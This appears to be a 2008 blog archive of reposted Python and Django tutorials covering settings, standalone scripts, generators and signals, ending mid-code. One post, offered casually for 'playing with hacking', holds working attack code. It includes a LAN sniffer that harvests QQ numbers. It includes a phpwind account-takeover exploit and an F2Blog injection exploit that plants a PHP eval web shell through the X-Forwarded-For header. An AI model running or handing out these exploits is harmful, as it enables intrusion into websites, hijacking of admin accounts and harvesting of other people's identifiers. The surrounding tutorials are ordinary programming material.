Monday, October 27, 2008

Django|python path

Setting Django Environment Variables in a Python Script

Posted: July 15, 2007
Author: Scott Newman
Category: Python, Django

When running Python programs to interact with the Django API, you don't always have the PYTHONPATH and DJANGO_SETTINGS_MODULE defined.

Before I learned this trick, I used to put my programs inside shell scripts that exported the path and settings variables before running the program. Crude, but effective.

One important thing to remember: if you're using the Django API, these steps must come before you import any Django components (views, models, etc.).

To set environment variables:

import os

os.environ['PYTHONPATH'] = '/home/code'
os.environ['DJANGO_SETTINGS_MODULE'] = 'myproject.settings'

To add locations to the search path:

import sys

sys.path.insert(0, '/home/code')

You can view the search path and environment variables like this:

import sys, os

print sys.path
print os.environ.keys()
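One caveat is worth checking for yourself: Python reads PYTHONPATH once, at interpreter startup, so assigning to os.environ['PYTHONPATH'] inside a running script should only affect child processes, while changing sys.path takes effect immediately. The following is a minimal sketch of that difference, written for Python 3; the /home/code path is the same placeholder used above.

```python
import os
import sys

code_dir = '/home/code'  # placeholder path from the example above

# Snapshot of the search path, kept for comparison.
before = list(sys.path)

# Changing the environment variable does not touch sys.path in this process;
# it is only inherited by child processes started afterwards.
os.environ['PYTHONPATH'] = code_dir
env_changed_path = (sys.path != before)

# Inserting into sys.path is what makes imports from code_dir work right now.
sys.path.insert(0, code_dir)
first_entry = sys.path[0]

print(env_changed_path)  # False
print(first_entry)       # /home/code
```

If a script needs modules from a directory that is not already on the path, the sys.path change is the one that matters for that script's own imports.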

Further Reading

Dive Into Python, Chapter 2.4.1. The Import Search Path
http://www.diveintopython.org/getting_to_know_python/everything_is_an_object.html#d0e4550

Python Library Reference, Chapter 14.1.1 Process Parameters
http://docs.python.org/lib/os-procinfo.html

Django|Standalone Django scripts

Standalone Django scripts

An entry published by James Bennett on September 22, 2007, Part of the category Django. Nine comments posted.

In the grand tradition of providing answers to frequently-asked questions from the django-users mailing list and the #django IRC channel, I’d like to tackle something that’s fast becoming the most frequently-asked question: how do you write standalone scripts which make use of Django components?

At first glance, this isn’t a terribly hard thing to do: Django’s just plain Python, and all of its components can — in theory — be imported and used just like any other Python modules. But the thing that trips most people up is the need, in most parts of Django, to supply some settings Django can use so it’ll know things like which database to connect to, which applications are available, where it can find templates, etc.

Depending on exactly what you need to do, there are several ways you can approach this problem, so let’s run through each of them in turn.

Set DJANGO_SETTINGS_MODULE before you run

The simplest method is to assign a value to the DJANGO_SETTINGS_MODULE environment variable before you run your script, which isn’t hard if you understand a little about how environment variables work. On most Unix-based systems (including Linux and Mac OS X), you can typically do this with the export command of the standard shell:

export DJANGO_SETTINGS_MODULE=yoursite.settings

Then you can just run any scripts which rely on Django settings, and they’ll work properly. If you’re using a different shell, or if you’re on Windows, the exact command to type will be slightly different, but the idea is the same.
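A script that relies on the variable being exported can check for it up front and fail with a readable message. This is only a sketch, written for Python 3: the helper name require_settings is made up for illustration and is not part of Django.

```python
import os

def require_settings(environ=os.environ):
    """Return the settings module name, or raise with a helpful message.

    require_settings is a hypothetical helper, not a Django function.
    """
    name = environ.get('DJANGO_SETTINGS_MODULE')
    if not name:
        raise RuntimeError(
            'DJANGO_SETTINGS_MODULE is not set; try: '
            'export DJANGO_SETTINGS_MODULE=yoursite.settings')
    return name

# A plain dict stands in for the real environment here.
print(require_settings({'DJANGO_SETTINGS_MODULE': 'yoursite.settings'}))
```

In a real script you would call require_settings() with no arguments before importing any Django components.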

One extremely useful application of this is in a crontab file; cron lets you set and change environment variables with ease, so you can have things like this in your crontab:

# Cron jobs for foo.com run at 3AM

DJANGO_SETTINGS_MODULE=foo.settings

0 3 * * * python /path/to/maintenance/script.py
30 3 * * * python /path/to/other/script.py

# Cron jobs for bar.com run at 4AM

DJANGO_SETTINGS_MODULE=bar.settings

0 4 * * * python /path/to/maintenance/script.py
30 4 * * * python /path/to/other/script.py

This is pretty much exactly what the crontab files on our servers at World Online look like, and in general this is the cleanest way to handle scripts which use Django components and need to run as cron jobs.

Use setup_environ()

Back in May, Jared Kuolt wrote up this technique, which is exactly how Django’s own manage.py script handles settings: the function setup_environ() in django.core.management will, given a Python module containing Django settings, handle all the business of (appropriately for its name) setting up your environment for you:

from django.core.management import setup_environ
from mysite import settings

setup_environ(settings)

Below the setup_environ() line, you can make use of any Django component and rest assured that the proper settings will be available for it.

The only real disadvantage to this is that you lose some flexibility: by tying the script to a particular settings module, you’re also tying it to a particular Django project, and if you later want to re-use it you’ll have to make a copy and change the import to point at another project’s settings file, or find a different way to configurably accept the settings to use (we’ll look at that again in a moment). If all you need is a one-off script for a particular project, though, this is an awfully handy way to set it up.

Use settings.configure()

For cases where you don’t want or need the overhead of a full Django settings file, Django provides a standalone method for configuring only the settings you need, and without needing to use DJANGO_SETTINGS_MODULE: the configure() method of the LazySettings class in django.conf (django.conf.settings is always an instance of LazySettings, which is used to ensure that settings aren’t accessed until they’re actually needed). There’s official documentation for this, and it’s fairly easy to follow along and use it in your own scripts:

from django.conf import settings

settings.configure(TEMPLATE_DIRS=('/path/to/template_dir',), DEBUG=False,
                   TEMPLATE_DEBUG=False)

And then below the configure() line you’d be able to make use of Django’s template system as normal (because the appropriate settings for it have been provided). This technique is also handy because for any “missing” settings you didn’t configure it will fill in automatic default values (see Django’s settings documentation for coverage of the default values for each setting), or you can pass a settings module in the default_settings keyword argument to configure() to provide your own custom defaults.

Like setup_environ(), this method does tie you down to a particular combination of settings, but again this isn’t necessarily a problem: it’s fairly common to have project-specific scripts which won’t need to be re-used and rely on some values particular to that project.

Accept settings on the command line

We’ve seen that setup_environ() and settings.configure() both seem to tie you to a particular settings module or combination of manually-provided settings, and while that’s not always a bad thing it presents a major stumbling block to reusable applications. Setting DJANGO_SETTINGS_MODULE (as seen above in the context of a crontab) is much more flexible, but can be somewhat tedious to do over and over again. So why don’t we come up with a method that lets you specify the settings to use when you call the script?

As it turns out, this is extremely easy to do; I think the technique doesn’t get a lot of attention because most newcomers to Django don’t yet know their way around Python’s standard library and so don’t stumble across the module which makes it all simple: optparse. In a nutshell, optparse provides an easy way to write scripts which take traditional Unix-style command line arguments, and to get those arguments translated into appropriate Python values.

A simple example would look like this:

import os
from optparse import OptionParser

usage = "usage: %prog -s SETTINGS | --settings=SETTINGS"
parser = OptionParser(usage)
parser.add_option('-s', '--settings', dest='settings', metavar='SETTINGS',
                  help="The Django settings module to use")
(options, args) = parser.parse_args()
if not options.settings:
    parser.error("You must specify a settings module")

os.environ['DJANGO_SETTINGS_MODULE'] = options.settings

There’s a lot going on here in a very small amount of code, so let’s walk through it step-by-step:

  1. We import the standard os module and the OptionParser class from optparse.
  2. We set up a usage string; optparse will print this in help and error messages.
  3. We create an OptionParser with the usage string.
  4. We add an option to the OptionParser: the script will accept an argument, either as -s or as the long option --settings, which will be stored in the “settings” attribute of the parsed options, and we provide it with some explanatory text to show in help and error messages.
  5. We parse the arguments from the command line using parser.parse_args().
  6. We check to see that the “settings” argument was supplied, and direct the parser to throw an error if it wasn’t.
  7. We use os.environ to set DJANGO_SETTINGS_MODULE.

Not bad for about ten lines of easy-to-write code; once that’s been done, DJANGO_SETTINGS_MODULE will have been set and we can use any Django components we like. Running the script will look like this:

python myscript.py --settings=yoursite.settings

The parser created with optparse will handle the parsing; it’ll also automatically enable a “help” option for the -h or --help flags, which will list all of the available options and their help text, and it will show appropriate error messages when the required “settings” argument isn’t supplied.

Because optparse makes it easy to pack a lot of configurability into a small amount of code, it’s generally my preferred method for writing standalone scripts which need to interact with Django, and I highly recommend spending some time with its official documentation. If you’d like to use one of the other configuration methods — setup_environ() or settings.configure() — it’s relatively easy to write an optparse-based script which does the right thing.
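For readers on newer Python versions, where argparse is the standard library's successor to optparse, roughly the same idea might look like the sketch below. The function name parse_settings and the fallback to an already-exported DJANGO_SETTINGS_MODULE are assumptions added for illustration; they are not from the original example.

```python
import argparse
import os

def parse_settings(argv, environ):
    """Pick the settings module from --settings, else from the environment.

    parse_settings is a hypothetical helper written for this sketch.
    """
    parser = argparse.ArgumentParser(description='Run a standalone Django script')
    parser.add_argument('-s', '--settings', metavar='SETTINGS',
                        default=environ.get('DJANGO_SETTINGS_MODULE'),
                        help='The Django settings module to use')
    options = parser.parse_args(argv)
    if not options.settings:
        parser.error('You must specify a settings module')
    return options.settings

# argv and environ are passed in explicitly so the function is easy to try out.
chosen = parse_settings(['--settings=yoursite.settings'], {})
os.environ['DJANGO_SETTINGS_MODULE'] = chosen
print(chosen)
```

In a real script you would pass sys.argv[1:] and os.environ, and set DJANGO_SETTINGS_MODULE before importing anything from Django.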

And that’s a wrap

Each of these methods is appropriate for different types of situations, and depending on exactly what you need to do you may end up using all of them at various times. Personally, I tend to either write scripts which use optparse and take a command-line argument for settings, or (for maintenance tasks which will run in cron) to write scripts which just assume DJANGO_SETTINGS_MODULE is taken care of in advance, but all of these methods can be useful, so keep them all in mind whenever you find yourself needing a standalone script that uses Django.

Sunday, October 26, 2008

Python|Six Handy Code Examples for Security Testing

Six Handy Python Code Examples for Security Testing


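Most of this code was collected from elsewhere. It comes in handy during testing: packet sniffing, sending requests, processing files with regular expressions, injection testing, and so on.
In practice you can extend it to suit your own project. The code favors brevity and leans toward security testing.
I have been learning Python for three months now and find it extremely useful.
A few days ago my PM even asked me to write a program to help with his office work.

Recently I have noticed many companies adding Python to their job postings.
There is little point in listing Python's features at length, so I will post some examples instead.
I recommend learning it when you have time; you can pick up the basics in about a day.
It is very popular abroad. My PM is German, and in his country people apparently learn Python directly, as commonly as we learn C here.
Many people and companies abroad do Python development; comparatively few do in China.
I learned it to help with my work and to play with hacking, but it is also powerful for everyday use.
Google has Google App Engine, a service similar to virtual hosting on which you develop web applications in Python.
Google itself also relies heavily on Python.

Most tasks can be handled with a single function: downloading files, sending requests, parsing web pages, reading and writing XML, compressing files, crawling and searching.
The vast majority of these programs are cross-platform and run on Linux.
IronPython is a tool that combines the .NET platform with Python; its developers are working on how to use Python to run .NET on Linux.

Nokia phones have also begun to support Python programming.
Java and .NET have also started to offer Python implementations.

Here are some examples that demonstrate what Python can do.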

1. Packet sniffing: this example sniffs the real playback URL of Flash videos on Tudou.
import pcap ,struct , re
from pickle import dump,load
pack=pcap.pcap()
pack.setfilter('tcp port 80')
regx=r'/[\w+|/]+.flv|/[\w+|/]+.swf'
urls=[]
hosts=[]
print 'start capture....'
for recv_time,recv_data in pack:
    urls=re.findall(regx,recv_data);
    if(len(urls)!=0):print urls;

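2. Sniffing QQ numbers: a few days ago I used this to sniff all the QQ numbers on the LAN. Unfortunately it cannot identify gender, but you can add that yourself.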

# -*- coding: cp936 -*-
import pcap ,struct
pack=pcap.pcap()
pack.setfilter('udp')
key=''
for recv_time,recv_data in pack:
recv_len=len(recv_data)
if recv_len == 102 and recv_data[42]== chr(02) and recv_data[101]
== chr(03):
print struct.unpack('>I',recv_data[49:53])[0]
elif recv_len == 55:
print struct.unpack('>I',recv_data[49:53])[0]

3. Packet sniffing: on a project I needed to capture data sent to a specific port, so I spent a few minutes writing this program.

import pcap ,struct
from pickle import dump,load
pack=pcap.pcap()
pack.setfilter('port 2425')
f=open(r'/mm.txt','w+')
print 'start capture....'
for recv_time,recv_data in pack:
    print recv_time
    print recv_data
    f.write(recv_data)

3.5. File content search: I found that the search built into Windows cannot search file contents, and even when it finds something the results are inaccurate, so I wrote my own.

import os,string,re,sys

class SevenFile:
    files=[]
    def FindContent(self,path):
        print 'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'
        walks=os.walk(path)
        for walk in walks:
            for filename in walk[2]:
                # Only look inside .mht files
                if('.mht' == filename[-4:]):
                    res_taskid=[]
                    file=os.path.join(walk[0],filename)
                    f=open(file)
                    content=f.read()
                    pattern_taskid=re.compile(r'Stonehenge-UIVerificationChecklist\.mht',re.IGNORECASE)
                    res_taskid=pattern_taskid.findall(content)
                    f.close()
                    # Remember every file whose content matched
                    if len(res_taskid)>0:
                        self.files.append(file)

def run():
    f=SevenFile()
    f.FindContent(r"E:\work\AP\Manual Tests\PSIGTestProject\PSIGTestProject")
    for filepath in f.files:
        print filepath
    print "OK"

if __name__=="__main__":
    run()

4. I did not write this one; it is code found online that attacks phpwind forums.

# -*- coding: gb2312 -*-
import urllib2,httplib,sys
httplib.HTTPConnection.debuglevel = 1
cookies = urllib2.HTTPCookieProcessor()
opener = urllib2.build_opener(cookies)

def usage():
print "Usage:\n"
print " $ ./phpwind.py pwforumurl usertoattack\n"
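print " pwforumurl target forum URL, e.g. http://www.80sec.com/"
print " usertoattack the target moderator or administrator who holds privileges"
print " The attack registers an account on the target forum identical to the target user's"
print " On the latest version you can log in with the uid"
print " On other versions you can log in with cookie+useragent"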
print "########################################################"
print ""

argvs=sys.argv
usage()

data = "regname=%s
%s1&regpwd=@80sec&regpwdrepeat=@80sec&regemail=...@foo.com&regemailtoall=1&step=2"
% (argvs[2],"%c1")
pwurl = "%s/register.php" % argvs[1]

request = urllib2.Request(
url = pwurl ,
headers = {'Content-Type' : 'application/x-www-form-
urlencoded','User-Agent': '80sec owned this'},
data = data)
f=opener.open(request)
headers=f.headers.dict
cookie=headers["set-cookie"]
try:
if cookie.index('winduser'):
print "Exploit Success!"
print "Login with uid password @80sec or Cookie:"
print cookie
print "User-agent: 80sec owned this"
except:
print "Error! http://www.80sec.com"
print "Connect root#80sec.com"

5. Injection attack: a demonstration of injection against a specific site.

#!c:\python24\pyton
# Exploit For F2Blog All Version
# Author BY MSN:pt...@vip.sina.com
# Date: Jan 29 2007

import sys
import httplib
from urlparse import urlparse
from time import sleep

def injection(realurl,path,evil): #url,/bk/,evilip
cmd=""
cookie=""
header={'Accept':'*/*','Accept-Language':'zh-
cn','Referer':'http://'+realurl[1]+path+'index.php','Content-
Type':'application/x-www-form-urlencoded','User-
Agent':useragent,'Host':realurl[1],'Content-length':len(cmd),
'Connection':'Keep-Alive','X-Forwarded-
For':evil,'Cookie':cookie}
#cmd =
"formhash=6a49b97f&referer=discuz.php&loginmode=&styleid=&cookietime=2592000&loginfield=username&username=test&password=123456789&questionid=0&answer=&loginsubmit=
%E6%8F%90+%C2%A0+%E4%BA%A4"
#print header
#print path
#sys.exit(1)
http = httplib.HTTPConnection(realurl[1])
http.request("POST",path+"index.php",cmd, header)
sleep(1)
http1 = httplib.HTTPConnection(realurl[1])
http1.request("GET",path+"cache/test11.php")
response = http1.getresponse()
re1 = response.read()
#print re1
print re1.find('test')
if re1.find('test') ==0:
print 'Expoilt Success!\n'
print 'View Your shell:\t%s' %shell
sys.exit(1);

else:
sys.stdout.write("Expoilt FALSE!")
http.close()
#sleep(1)
#break
sys.stdout.write("\n")

def main ():
print 'Exploit For F2Blog All Version'
print 'Codz by pt...@vip.sina.com\n'
if len(sys.argv) == 2:
url = urlparse(sys.argv[1])
if url[2:-1] != '/':
u = url[2] + '/'
else:
u = url[2] #u=/bk/
else:
print "Usage: %s " % sys.argv[0]
print "Example: %s http://127.0.0.1/bk" % sys.argv[0]
sys.exit(0)

print '[+] Connect %s' % url[1]
print '[+] Trying...'
print '[+] Plz wait a long long time...'
global shell,useragent
shell="http://"+url[1]+u+"cache/test11.php"
query ='fputs(fopen(\'cache/test11.php\',\'w+\'),\'@eval($_REQUEST[c])?>test\')'
query ='\'));'+query+';/*'
evilip=query
useragent=""
cookie=""
injection(url,u,evilip)
evilip=""
injection(url,u,evilip)

print '[+] Finished'

if __name__ == '__main__': main()

6. Injection attack: this is a complete Access + ASP injection tool.
The code is rather long, so download it yourself.

http://www.xfocus.net/tools/200408/780.html

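There is also a more powerful Python injection tool from abroad, sqlmap, which supports nearly every database in current use. It handles MySQL, Oracle, PostgreSQL and Microsoft SQL Server back ends, and besides these four DBMSs it can also identify Microsoft Access, DB2, Informix and Sybase.

Search for it and download it yourself.

It supports GET, POST and cookie injection, and lets you add a cookie and a user agent.
It supports blind injection, error-based injection, and several other injection methods.
It supports proxies.
Its algorithms are optimized for efficiency.
It uses fingerprinting to identify the database.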

Wednesday, October 22, 2008

Python|Recursion and Generators

Recursion and Generators

Abstract: Certain kinds of problems can be described quite efficiently with recursive procedures. But sometimes you need strict control over recursive procedures that produce a huge amount of data, which makes coding harder. Python generators, available in Python 2.2 and later, let us control these procedures easily while keeping programs concise.


Introduction

No one doubts the power of recursion. Although it can sometimes look a little complicated, it normally provides a quick way to describe a solution. This is especially true when the amount of data handled by a procedure grows exponentially. Traversing a tree is a good example. Since each internal node of a tree has one or more child nodes, the number of nodes grows exponentially as the procedure goes down the tree. But if all nodes are homogeneous, the same procedure can be applied to every node again and again.

Tree traversal is a trivial example of recursion, because almost every computer science textbook explains it. Probably everyone will happily choose recursion for tree traversal without much deliberation. Of course, there are many other tasks where recursion works well, so let us take another example.

Consider the following function f, which takes a list of vectors (V1, V2, V3, ... , Vn) and returns the set of all possible combinations that take one element from each Vi. Each combination is an n-element vector (y1, y2, ... , yn) in which yi is one of the elements xi1, xi2, ... , xim of Vi. The total number of vectors this function returns is |V1| x |V2| x |V3| x ... x |Vn|.

Let us consider implementing this function in Python. For simplicity, we use String objects to represent each vector Vi. The function returns a set of vectors as a list. The expected result is the following:

f([]) --> ['']  # 1
f(['abc']) --> ['a', 'b', 'c'] # 3
f(['abc', 'xyz']) --> ['ax', 'ay', 'az', 'bx', 'by', 'bz', 'cx', 'cy', 'cz'] # 9
f(['abc', 'xyz', '123']) --> ['ax1', 'ax2', 'ax3', 'ay1', 'ay2', 'ay3', 'az1', 'az2', 'az3',
'bx1', 'bx2', 'bx3', 'by1', 'by2', 'by3', 'bz1', 'bz2', 'bz3',
'cx1', 'cx2', 'cx3', 'cy1', 'cy2', 'cy3', 'cz1', 'cz2', 'cz3'] # 27
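For reference, this function is the Cartesian product of its arguments. Later Python versions ship itertools.product, which can serve as a quick cross-check for the hand-written versions discussed in this article. A minimal sketch for Python 3 follows; the name f_product is made up for illustration.

```python
from itertools import product

def f_product(args):
    """Return every combination as a list of strings, like f above.

    f_product is a hypothetical name used only for this sketch.
    """
    return [''.join(combo) for combo in product(*args)]

print(f_product(['abc', 'xyz']))
```

With no arguments, product() yields a single empty tuple, so f_product([]) gives [''], matching the first expected result above.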

At first glance, it looks easy to implement. You might think that this function can be written easily without any recursion. Let's try.


Solutions

First, if you don't want to use recursion at all, your program might end up with something like this:

Non-recursive Version

def f0(args):
    counter = [ 0 for i in args ]
    r = []
    while 1:
        r.append("".join([ arg1[i] for arg1,i in zip(args, counter) ]))
        carry = 1
        x = range(len(args))
        x.reverse() # x == [len(args)-1, len(args)-2, ..., 1, 0]
        for i in x:
            counter[i] += 1
            if counter[i] < len(args[i]):
                carry = 0
                break # leave "for"
            counter[i] = 0
        else:
            break # leave "while"
    return r

Without recursion, you have to remember intermediate states somehow to produce all possible solutions. In this program, I tried to emulate something like a chain of full adders. First the program prepares a list of integers (the counter), and then it repeatedly attempts to add one to the least significant digit, carrying into the next digit on overflow. At each iteration, it concatenates the elements selected from each argument and appends the result to the variable r. But the behavior of this program is not so clear, even though some variable names such as "carry" are suggestive.

Recursive Version

Now you have recursion. The function f can be defined recursively as follows:

f(Vi, Vi+1, ... , Vn) = ({xi1} + f(Vi+1, ... , Vn)) +
                        ({xi2} + f(Vi+1, ... , Vn)) +
                        ...
                        ({xim} + f(Vi+1, ... , Vn)) .

With this definition, you can make the program much simpler by having it call itself:

def fr(args):
    if not args:
        return [""]
    r = []
    for i in args[0]:
        for tmp in fr(args[1:]):
            r.append(i + tmp)
    return r

The implementation above is very straightforward. The power of recursion is that you can split the problem into several subproblems and apply exactly the same machinery to each subproblem. This program simply takes each element of the first argument and concatenates it with every solution of the same function called with one fewer argument (Fig 1).


Fig 1. Recursive Version

More Solutions

So far we have seen functions which return all the results at once. But in some applications, such as searching or enumerating, you probably don't want to remember all the combinations. What you want is to inspect one combination at a time and throw it away after using it.

When the number of outputs is small, this is not a big deal. But what we expect of recursive procedures is a quick solution for functions whose results grow exponentially, right? Ironically, such functions tend to produce a huge amount of data that causes problems in your program. In many language implementations, the program cannot hold all the results, and sooner or later it reaches the memory limit:

$ ulimit -v 5000
$ python
...
>>> for x in fr(["abcdefghij","abcdefghij","abcdefghij","abcdefghij","abcdefghij"]):
...     print x
...
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
  File "<stdin>", line 7, in fr
MemoryError

The typical solution for this is to split every combination into different states. The typical way to do this in Python is to build an iterator.

Iterator Version

In Python, an instance of a class that defines an __iter__ method (and, for the iterator itself, a next method) can be used as an iterator. Although iterators are not functionally identical to lists, they can stand in for lists in some statements and functions (for, map, filter, etc.).

class fi:
    def __init__(self, args):
        self.args = args
        self.counter = [ 0 for i in args ]
        self.carry = 0
        return

    def __iter__(self):
        return self

    def next(self):
        if self.carry:
            raise StopIteration
        r = "".join([ arg1[i] for arg1,i in zip(self.args, self.counter) ])
        self.carry = 1
        x = range(len(self.args))
        x.reverse() # x == [len(args)-1, len(args)-2, ..., 1, 0]
        for i in x:
            self.counter[i] += 1
            if self.counter[i] < len(self.args[i]):
                self.carry = 0
                break
            self.counter[i] = 0
        return r

# display
def display(x):
    for i in x:
        print i,
    print
    return

In this program, you can use the constructor of the class fi in the same manner as the recursive version fr as in:

>>> display(fi(["abc","def"])) 

When this instance is passed to a for statement, the __iter__ method is called and the returned object (the object itself in this case) is used as the iterator of the loop. At each iteration, the next method is called without arguments and its return value is stored in the loop variable.
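The loop that a for statement runs behind the scenes can be written out by hand, which may make the protocol easier to picture. The sketch below is for Python 3, where the built-in next() calls the iterator's __next__ method (the method named next in the Python 2 code above); manual_for is a made-up name.

```python
def manual_for(iterable):
    """Collect items the way a for statement does, using iter() and next()."""
    collected = []
    iterator = iter(iterable)      # calls iterable.__iter__()
    while True:
        try:
            item = next(iterator)  # asks the iterator for its next value
        except StopIteration:
            break                  # this is where a for statement ends
        collected.append(item)
    return collected

print(manual_for('abc'))  # ['a', 'b', 'c']
```

The StopIteration raised by the iterator is the signal the loop uses to stop.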

However, this program is not easy to understand. Algorithmically, it is similar to the non-recursive version described above. Each time the next method is called, it updates the current state stored in the counter variable and returns one result according to that state. But it looks even more complicated, because the method is designed to be called from inside a loop that is not shown explicitly here. Readers might be puzzled to see it check the carry variable at the top of the next method; they have to imagine an (invisible) loop outside this method to understand it.

Generator Version

Now we have generators. The program gets much simpler:

def fg(args):
    if not args:
        yield ""
        return
    for i in args[0]:
        for tmp in fg(args[1:]):
            yield i + tmp
    return

Note that this is not only simpler than the iterator version, but even simpler than the original recursive version. With generators, we can simply throw (or "yield") results one at a time and forget them afterwards. It is just like printing results to a stream device. You don't really have to care about preserving state. All you have to do is produce all the results recklessly, and you still keep strict control over the procedure. You might notice that a similar function can be realized with lazy evaluation, which is supported in some functional languages. Although lazy evaluation and generators are not exactly the same notion, both help handle the same situation in different forms.
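To see the "strict control" in practice, the generator can be stopped after a few results without computing the rest. The sketch below repeats fg so that it runs on its own under Python 3, and uses itertools.islice to take only the first three combinations.

```python
from itertools import islice

def fg(args):
    if not args:
        yield ""
        return
    for i in args[0]:
        for tmp in fg(args[1:]):
            yield i + tmp

# Five ten-letter strings describe 100,000 combinations, but only the
# first three are requested from the generator here.
big = ["abcdefghij"] * 5
first_three = list(islice(fg(big), 3))
print(first_three)  # ['aaaaa', 'aaaab', 'aaaac']
```

This is the same input that exhausted memory in the list-returning version under the ulimit shown earlier.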

Lambda-encapsulation Version

Functional programmers might prefer lambda encapsulation to objects, and Python allows this too. In fact, however, this was a real puzzle to me. I could have done things in the same manner as in the iterator version, but I wanted to do something different. After hours of struggle, I finally came up with something like this:

def fl(args, i=0, tmp="", parent_sibling=None):
    if not args:
        # at a leaf
        return (tmp, parent_sibling)
    if i < len(args[0]):
        # prepare my sibling
        sibling = fl(args, i+1, tmp, parent_sibling)
        return lambda: fl(args[1:], 0, tmp+args[0][i], sibling)
    else:
        # go up and visit the parent's sibling
        return parent_sibling

# traverse function for lambda version
def traverse(n):
    while n:
        if callable(n):
            # node
            n = n()
        else:
            # leaf
            (result, n) = n
            print result,
    print

The idea is indeed to treat it as tree traversal. The function f can be regarded as a tree which contains a partial result at each node (Fig 2). A function produced by fl retains its position, the next sibling node, and the next sibling of the parent node in the tree. As it descends the tree, the elements of the vectors are accumulated. When it reaches a leaf, it has one complete solution (a combination of elements). If there is no node left to traverse at the same level, it goes back to the parent node and tries the next sibling of the parent node. We need a special driver routine to traverse the tree.
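The driver routine does not have to print. As a sketch for Python 3, the same walk over the chain of closures can be wrapped in a generator so that callers receive the results one by one. fl is repeated unchanged so the example is self-contained, and iter_results is a made-up name.

```python
def fl(args, i=0, tmp="", parent_sibling=None):
    if not args:
        # at a leaf: a complete result plus where to go next
        return (tmp, parent_sibling)
    if i < len(args[0]):
        # prepare my sibling
        sibling = fl(args, i + 1, tmp, parent_sibling)
        return lambda: fl(args[1:], 0, tmp + args[0][i], sibling)
    else:
        # go up and visit the parent's sibling
        return parent_sibling

def iter_results(n):
    """Walk the chain of closures and yield each leaf result in turn."""
    while n:
        if callable(n):
            n = n()            # node: descend one level
        else:
            result, n = n      # leaf: hand out the result, then move on
            yield result

print(list(iter_results(fl(["ab", "xy"]))))  # ['ax', 'ay', 'bx', 'by']
```

The closures hold the traversal state, and the generator only decides when to take the next step.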


Fig 2. The Function f as Tree Traversal

Of course the generator version can be also regarded as tree traversal. In this case, you will be visiting a tree and dropping a result at each node.


CHANGES:
Jun 1, 2003: Released.
Jun 7, 2003: A small update based on the comments by Eli Collins.

Tuesday, October 21, 2008

Django|Signals in Django: Stuff That’s Not Documented (Well)

Ref From URL:http://www.chrisdpratt.com/2008/02/16/signals-in-django-stuff-thats-not-documented-well/

I’ve just spent the last few hours learning how to use signals in Django. After many, many searches on Google and much trial and error, I think I finally have a grasp on these silly things, and since I’m an all around nice guy, I’m going to spare those lucky few that happen upon this post the same hell.

Before I start, I want to go ahead and give credit to those who provided some of the crucial pieces to the puzzle during my quest.

Okay, now let’s get started.

Creating Custom Signals

In the application I’m working on, I needed to send an email whenever a user reset his/her password, a pretty common use case. Unfortunately, none of Django’s built-in signals fit the bill. The User model gets saved when the password is reset (allowing the use of the post_save signal), but it also gets saved in a lot of other scenarios. The password reset is a special case and needed to be handled as such.

Turns out that it’s actually not that difficult to set this up. If you haven’t already, create a file named signals.py in the directory of the application you’re working on. Then add the following to that file:

# myapp/signals.py
password_reset = object()

The name `password_reset` is inconsequential; use whatever name best conveys the action that causes the signal to be sent.

Next, set up a listener for that signal. The following code can technically go just about anywhere, as long as it gets executed before the signal is sent. I put it in models.py for ease.

# myapp/models.py
from django.dispatch import dispatcher
from myproject.myapp import signals as custom_signals
...
# The receiver function is defined in signals.py, so reach it through the module
dispatcher.connect(custom_signals.send_password_reset_email, signal=custom_signals.password_reset)

`send_password_reset_email` is the function that will be called when the signal is received. Obviously, we’ll need to set that up. Back to signals.py:

# myapp/signals.py
from django.conf import settings
from django.core.mail import send_mail
from django.contrib.sites.models import Site
from django.template.loader import render_to_string
...
def send_password_reset_email(sender, user, new_pass, signal, *args, **kwargs):
    current_site = Site.objects.get_current()
    subject = "Password Reset on %(site_name)s" % { 'site_name': current_site.name }
    message = render_to_string(
        'account/password_reset_email.txt',
        { 'username': user.username,
          'new_pass': new_pass,
          'current_site': current_site }
    )
    send_mail(subject, message, settings.DEFAULT_FROM_EMAIL, [user.email])

Exactly how this code works is left as an exercise to the reader. I provided it merely to be comprehensive. What the function that gets called when the signal is received does will be specific to your purposes.

However, there are a few points worth mentioning. When you use Django’s built-in signals, your function definition will almost invariably look like the following:

def my_function(sender, instance, signal, *args, **kwargs):

Notice that my definition didn’t include `instance` and had `user` and `new_pass` arguments instead. You can pass whatever arguments you like when you send the signal (we’ll get to this in a second). The only requirement is that the function that gets called can handle them. Django simply chose to use an argument named `instance`, nothing more, nothing less.

Finally, at the exact point where you want the function associated with the signal to be executed (in my case, right after a new password is generated and the User instance is saved), insert the following:

dispatcher.send(signal=custom_signals.password_reset, user=self.user, new_pass=new_pass)

The only required part is obviously the signal you want to send. Everything after is simply data you’d like to pass along. Remember that the function definition in signals.py must accept all the arguments you choose to pass in.
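To make the flow of arguments concrete, here is a toy dispatcher written in plain Python 3. It is only an illustration of the connect/send idea and is not Django's implementation: ToyDispatcher and on_password_reset are made-up names, and the user and password values are dummies.

```python
class ToyDispatcher:
    """A tiny stand-in for a signal dispatcher; NOT Django's implementation."""

    def __init__(self):
        self._receivers = {}   # maps signal object -> list of receiver functions

    def connect(self, receiver, signal):
        self._receivers.setdefault(signal, []).append(receiver)

    def send(self, signal, sender=None, **named):
        # Every receiver gets the signal, the sender, and the extra keyword data.
        return [receiver(sender=sender, signal=signal, **named)
                for receiver in self._receivers.get(signal, [])]

password_reset = object()      # any unique object can identify the signal
dispatcher = ToyDispatcher()

def on_password_reset(sender, user, new_pass, signal, *args, **kwargs):
    return 'reset for %s' % user

dispatcher.connect(on_password_reset, signal=password_reset)
results = dispatcher.send(signal=password_reset, user='alice', new_pass='s3cret')
print(results)  # ['reset for alice']
```

The keyword arguments given to send() arrive as the receiver's parameters, which is why the receiver's signature has to accept everything you pass.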

Also don’t forget to add the following to your imports in the file where you call dispatcher.send():

from django.dispatch import dispatcher
from myproject.myapp import signals as custom_signals

And we’re done. Easy as pie, once you know what you’re doing.

Signaling Just When an Object is Created

Conspicuously missing from Django’s built-in signals is one for the creation of an object. We have pre_save and post_save signals, but both of those work whether the object is being created or just being updated.

Again, finding a solution to this little issue was spurred by my own needs. I wanted to send a welcome email when a user first registers, another common use case. Obviously, I didn’t want the same welcome email sent every time the user updates their details, so post_save was out. Or was it?

After a fair amount of digging, I found the solution squirreled away in Django’s model tests. Apparently, Django automagically passes a `created` flag along with post_save, set to True when the object was just created, so all that’s required is to test that flag before you do whatever you plan on doing (sending the welcome email in my case).

def send_welcome_email(sender, instance, signal, *args, **kwargs):
